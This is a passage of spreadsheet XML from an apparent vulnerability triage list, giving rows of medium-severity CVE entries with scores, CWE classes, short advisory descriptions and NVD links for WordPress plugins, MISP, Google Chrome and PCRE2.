        </is>
      </c>
      <c r="S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81910</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85116</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>The Simple CAPTCHA with Cloudflare Turnstile WordPress plugin from 1.2.2 before 1.42.3 runs the shortcode parser over the whole rendered Contact Form 7 form, including the values a visitor submitted, allowing unauthenticated users to execute arbitrary shortcodes registered on the site.</t>
        </is>
      </c>
      <c r="S636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85116</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85239</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in MISP's event template handling allowed an authenticated user with permission to create or modify event templates to bypass validation of the template definition field.
The EventTemplate::beforeValidate() method only performed semantic validation when the supplied definition was already represented as an array. If a caller instead supplied a pre-encoded string, including malformed JSON or JSON representing an unexpected data type, the value bypassed validateDefinition() and only needed to satisfy the generic notBlank validation rule. As a result, an invalid event template definition could be stored persistently in the database.
When event templates were subsequently retrieved, EventTemplate::afterFind() attempted to decode the stored definition using JsonTool::decode() without handling decoding failures. A definition containing invalid JSON could therefore trigger an exception during retrieval. Because the event template index is available to all authenticated users, a single malicious or malformed template could make the event template listing and other functionality relying on EventTemplate queries return HTTP 500 errors until the offending database row was manually repaired.
Valid JSON representing an unexpected type, rather than the expected JSON object, could similarly result in invalid data reaching downstream consumers.
The vulnerability can therefore be exploited by a user capable of saving event templates to persist malformed template data and cause a persistent denial of service against event-template functionality for other users.
The patch enforces that event template definitions must be supplied as structured objects before saving and always applies semantic validation. On retrieval, malformed JSON and definitions that do not decode to the expected structure are caught, logged, and replaced with an empty definition, preventing a malformed database entry from breaking all event template queries.
 Poisoning doesn't seem reachable according to the lead developer.</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85239</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86812</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>The WPCafe  WordPress plugin before 3.0.18 does not correctly restrict access to a set of order-management REST endpoints because their permission callbacks return an incorrect type on failure, allowing unauthenticated users to disclose guest order information and to change the status of, or trash, any order.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86812</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87468</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87468</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87493</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87493</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87519</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87519</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87522</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87522</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87580</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr"/>
      <c r="Q643" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebAppInstalls in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87580</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87584</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr"/>
      <c r="Q644" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87584</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87589</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr"/>
      <c r="Q645" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87589</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87591</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr"/>
      <c r="Q646" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87591</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87600</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr"/>
      <c r="Q647" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Safebrowsing in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87600</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87603</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr"/>
      <c r="Q648" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87603</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87610</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr"/>
      <c r="Q649" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Omnibox in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87610</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87626</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr"/>
      <c r="Q650" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DeviceBoundSessionCredentials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87626</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89158</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr"/>
      <c r="Q651" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_compile_32 integer overflow and resultant out-of-bounds write.</t>
        </is>
      </c>
      <c r="S651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89158</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89160</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
